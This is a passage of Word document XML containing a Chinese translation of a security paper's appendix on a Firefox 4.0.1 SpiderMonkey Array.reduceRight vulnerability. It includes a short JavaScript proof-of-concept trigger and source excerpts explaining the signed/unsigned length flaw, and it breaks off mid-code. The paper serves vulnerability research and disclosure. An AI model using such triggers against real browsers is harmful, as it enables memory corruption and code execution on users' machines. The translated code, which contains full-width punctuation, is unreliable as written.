    <w:p w14:paraId="5447F94E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="550"/>
        </w:tabs>
        <w:ind w:left="549" w:hanging="389"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>http://www.phreedom.org/research/heap-feng-shui/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Alex </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Sotirovs堆风水论文</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6833FB34" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D38D9E0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="550"/>
        </w:tabs>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:ind w:right="1580" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId27">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>我们的模糊测试工具发现的http://www.mozilla.org/security/announce/2011/mfsa2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>011-22.html Fi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>refox S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pider Monkey </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Array.reduceRight漏洞</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="790B33FF" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="271" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD6C4BC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="62"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="734626F4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="66"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Firefox 4.0.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Array.reduceRight</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>案例研究</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6551437E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7997257E" w14:textId="08A054AE" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>我们的</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fuzzer</w:t>
      </w:r>
      <w:r>
        <w:t>在Firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SpiderMonkey</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>前端发现了一个非常关键的漏洞[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>16]，我们决定向Mozilla报告。该漏洞同时允许信息泄漏和任意代码执行。可以结合使用这两个属性，以独立于任何JIT引擎击败ASLR / DEP。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>但是，我们想探索使用JIT引擎利用关键代码执行漏洞的可能性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686421E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A34FBD" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="1368"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>下列JavaScript行在Firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 3.6.17和4.0.1中触发了我们的漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F36F382" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2880A4" w14:textId="2169BB2A" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="400" w:right="6639"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>xyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>xyz.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 4294967240;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDBF92F" w14:textId="1895ADFF" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="205" w:lineRule="exact"/>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>a =</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">unction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>rr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>rev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, current, index, array</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="47F33F3D" w14:textId="17D60096" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="34"/>
        <w:ind w:left="640"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="000D3EB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>urrent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CDE5B8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="33"/>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2A686" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="14"/>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>xyz.reduceRight</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1,2,3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB44FC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C25D60" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="568"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>下面我们简要概述了Firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4.0.1源代码中的漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0884FFF3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715BB91C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="622"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JavaScript中对redu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ceRight方法的调用</w:t>
      </w:r>
      <w:r>
        <w:t>会触发对jsarray.cpp中的C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ++ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>array_extra函数的调用</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在第2740行，将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Array.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>属性分配给一个无符号整数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D94AF9" w14:textId="59B9929C" w:rsidR="0026102A" w:rsidRPr="005D386D" w:rsidRDefault="005D386D">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="640"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jsuint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391E3090" w14:textId="482516C6" w:rsidR="0026102A" w:rsidRDefault="005D386D">
      <w:pPr>
        <w:spacing w:before="14" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="4000" w:hanging="481"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>_GetLengthProperty</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cx</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，＆</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>））</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">eturn </w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JS_FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5639D2B0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035483A1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="727"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在2767</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>行上，如果调用的方法为reduceRight，则将start，e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nd和step初始化但取反</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这些变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>量都</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>jsi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的有符号整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324D8FED" w14:textId="77777777" w:rsidR="005D386D" w:rsidRDefault="005D386D">
      <w:pPr>
        <w:spacing w:before="25" w:line="500" w:lineRule="exact"/>
        <w:ind w:left="640" w:right="4479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>= 0</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
